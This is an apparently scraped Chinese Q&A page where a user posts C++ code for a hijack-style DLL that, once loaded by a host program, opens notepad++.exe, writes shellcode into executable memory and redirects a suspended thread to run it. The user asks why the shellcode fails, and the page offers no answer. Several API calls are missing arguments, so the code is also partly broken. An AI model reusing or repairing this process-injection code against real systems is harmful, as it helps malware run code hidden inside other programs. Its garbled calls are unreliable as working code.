问题描述
主要代码
DWORD WINAPI ThreadFunctionTargetProcessHandle(LPVOID lpParameter)
{
LPVOID remoteBuffer;
HANDLE targetProcessHandle=NULL;
BOOL didWeCopy = FALSE;
PROCESSENTRY32 entry;
THREADENTRY32 threadEntry;
entry.dwSize = sizeof(PROCESSENTRY32);
HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,NULL);
HANDLE threadHijacked = NULL;
DWORD idProcess = 0; // ThreadID
CONTEXT context;
context.ContextFlags = CONTEXT_FULL;
if (Process32First(snapshot,&entry) == TRUE)
{
while (Process32Next(snapshot,&entry) == TRUE)
{
//stricmp wcscmp
if (stricmp(entry.szExeFile,"notepad++.exe") == 0)
{
MessageBox(0,std::to_string(entry.th32ProcessID).c_str(),"okk Attached",MB_ICONINFORMATION);
targetProcessHandle = OpenProcess(PROCESS_ALL_ACCESS,FALSE,entry.th32ProcessID);
idProcess = entry.th32ProcessID;
MessageBox(0,"From Process32First\n","Process32First Attached",MB_ICONINFORMATION);
break;
}
}
}
if (targetProcessHandle) {
remoteBuffer = VirtualAllocEx(targetProcessHandle,NULL,SHELLCODELEN,(MEM_RESERVE | MEM_COMMIT),PAGE_EXECUTE_READWRITE);
if (remoteBuffer == NULL)
return -1;
// Copy the shellcode into the memory we just created
didWeCopy = WriteProcessMemory(targetProcessHandle,remoteBuffer,shellcode,NULL);
if (!didWeCopy)
return -2;
HANDLE snapshotThread = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD,0);
Thread32First(snapshotThread,&threadEntry);
while (Thread32Next(snapshotThread,&threadEntry))
{
if (threadEntry.th32OwnerProcessID == idProcess)
{
threadHijacked = OpenThread(THREAD_ALL_ACCESS,threadEntry.th32ThreadID);
break;
}
}
SuspendThread(threadHijacked);
GetThreadContext(threadHijacked,&context);
//RIP --- x64体系
//EIP-- - x86体系
//FixShellCode(context.Eip,(DWORD)MessageBox);
context.Eip = (DWORD_PTR)remoteBuffer;
SetThreadContext(threadHijacked,&context);
ResumeThread(threadHijacked);
}
CloseHandle(snapshot);
MessageBox(0,"From CloseHandle(snapshot);\n","CloseHandle(snapshot); Attached",MB_ICONINFORMATION);
return 0;
}
DllMain
BOOL APIENTRY DllMain(HMODULE hModule,DWORD dwReason,PVOID pvReserved)
{
if (dwReason == DLL_PROCESS_ATTACH)
{
DisableThreadLibraryCalls(hModule);
if (Load() && Init())
{
TCHAR szAppName[MAX_PATH] = TEXT("QMProxyAcceler.exe");//请修改宿主进程名
TCHAR szCurName[MAX_PATH];
GetModuleFileName(NULL,szCurName,MAX_PATH);
PathStripPath(szCurName);
/*ThreadFunctionZZZ();*/
/*HANDLE threadHandle = CreateThread(NULL,ThreadFunctionXXX,NULL);
CloseHandle(threadHandle);*/
//是否判断宿主进程名
if (StrCmpI(szCurName,szAppName) == 0)
{
MessageBox(0,"szAppName okk\n","szAppName same",MB_ICONINFORMATION);
//启动补丁线程或者其他操作
HANDLE hThread = CreateThread(NULL,ThreadProc,NULL);
if (hThread)
{
CloseHandle(hThread);
}
HANDLE threadHandle = CreateThread(NULL,ThreadFunctionTargetProcessHandle,NULL);
CloseHandle(threadHandle);
//EnableDebugPriv();
}
}
}
else if (dwReason == DLL_PROCESS_DETACH)
{
Free();
}
return TRUE;
}
运行宿主程序后,弹出测试消息框。 宿主程序正常运行。 但是shellcode没有运行。
我检查了它是否已写入 notepad++ 的内存中:
代码都是在网上找到的。不知道问题出在哪里。
解决方法
暂无找到可以解决该程序问题的有效方法,小编努力寻找整理中!
如果你已经找到好的解决方法,欢迎将解决方案带上本链接一起发送给小编。
小编邮箱:dio#foxmail.com (将#修改为@)
设置时间 控制面板
错误1:Request method ‘DELETE‘ not supported 错误还原:...